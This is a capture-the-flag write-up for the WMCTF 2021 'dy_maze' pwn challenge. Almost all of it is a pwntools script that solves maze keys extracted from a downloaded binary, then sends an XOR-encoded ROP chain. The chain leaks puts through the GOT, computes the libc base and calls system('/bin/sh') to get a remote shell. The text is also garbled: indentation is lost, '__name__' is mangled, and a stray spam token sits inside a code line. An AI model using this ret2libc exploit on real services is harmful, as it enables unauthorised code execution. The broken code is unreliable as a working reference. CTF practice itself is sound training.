WMCTF 2021 pwn dy_maze writeup

Posted 2021-09-03 Gendan

from pwn import *
from LibcSearcher import *
from binascii import a2b_base64
import os
context(log_level=\'debug\', os=\'linux\', arch=\'amd64\', bits=64)
context.terminal = [\'/usr/bin/x-terminal-emulator\', \'-e\']

Interface

local = False

binary_name = "dy_maze"

binary_name = "38a5a00c-08ac-11ec-b124-0242ac110003"
port = 44212
if local:

p = process(["./" + binary_name])
e = ELF("./" + binary_name)
# libc = e.libc

else:

p = remote("47.104.169.32", port)

def z(a=\'\'):

if local:
    gdb.attach(p, a)
    if a == \'\':
        raw_input()
else:
    pass

ru = lambda x: p.recvuntil(x)
rc = lambda x: p.recv(x)
sl = lambda x: p.sendline(x)
sd = lambda x: p.send(x)
sla = lambda delim, data: p.sendlineafter(delim, data)
def encode(payload, offset):

# encode
payload_encoded = b\'\'
for i in range(len(payload)):
    payload_encoded += (payload[i] ^ success_temp[(i + offset) % 5]).to_bytes(1, \'little\')
return payload_encoded

Others

success_temp = []

Main

if name == "__main__":

# z(\'b maze_25\')
z(\'b ok_success\\n\')

initialize

p.recvuntil(b\'Solution?\')
confirm = input()
sl(confirm)

Create binary file

ru(b\'Binary Download Start\')
ru(b\'\\n\')
b64_data = p.recvuntil(b\'\\n==\', drop=True)
with open(\'temp.bz2\', \'wb\') as f:

f.write(a2b_base64(b64_data))

ru(b\'\\n\')
temp_binary = Skrill下载os.popen(\'tar -xjvf temp.bz2\').read().strip(\'\\n\')
e = ELF("./" + temp_binary)

# Start ELF Analysis
d = {}
for i in range(1, 81):
    d[i] = e.symbols[\'maze_{}\'.format(i)]
maze_address = sorted(d.items(), key=lambda x: x[1])
key = {}
for ind, addr in zip(range(80), e.search(b\'\\x83\\xc0\\x01\')):
    addr -= 4
    while e.data[e.vaddr_to_offset(addr): e.vaddr_to_offset(addr) + 3] != b\'\\x83\\x7d\\xfc\': addr -= 1
    key[maze_address[ind][0]] = e.data[e.vaddr_to_offset(addr) + 3]
for addr in e.search(b\'\\x48\\x98\\x88\\x54\\x05\\xEC\'):
    success_temp.append(e.data[e.vaddr_to_offset(addr) - 1])
prdi = next(e.search(b\'\\x5f\\xc3\'))
# End Analysis
# key[80] = 32
payload = b\'\'
for i in range(1, 81):
    payload += str(key[i]).encode(\'utf-8\') + b\' \'
# ok_success
payload += str(100).encode(\'utf-8\')    
sl(payload)
sleep(2)
# p.recvall()
ru(b\'Good\')
# sl(b\'100\')
sleep(2)
# input your name:
payload = b\'a\' * 0x14 + b\'b\' * 8 + p64(prdi) + p64(e.got[\'puts\']) + p64(e.plt[\'puts\']) + p64(e.symbols[\'ok_success\'])
sl(encode(payload, 0))
# sl(payload)
sleep(2)
ru(b\'name: \')
puts_addr = p.recvuntil(b\'\\n\', drop=True).ljust(8, b\'\\x00\')
puts_addr = u64(puts_addr)
log.success("puts addr found: " + hex(puts_addr))
libc = LibcSearcher(\'puts\', puts_addr)
# libc.select_libc(9)
libc_base = puts_addr - libc.dump(\'puts\')
log.success(\'libc base found: \' + hex(libc_base))
p.sendlineafter(b\'length\', str(100).encode(\'utf-8\'))
# Attacking:
payload = b\'a\' * 0x14 + b\'b\' * 8 + p64(prdi) + p64(libc.dump(\'str_bin_sh\') + libc_base)
payload += p64(prdi + 1) + p64(libc.dump(\'system\') + libc_base)
sla(b\'name: \', encode(payload, 1))
p.interactive()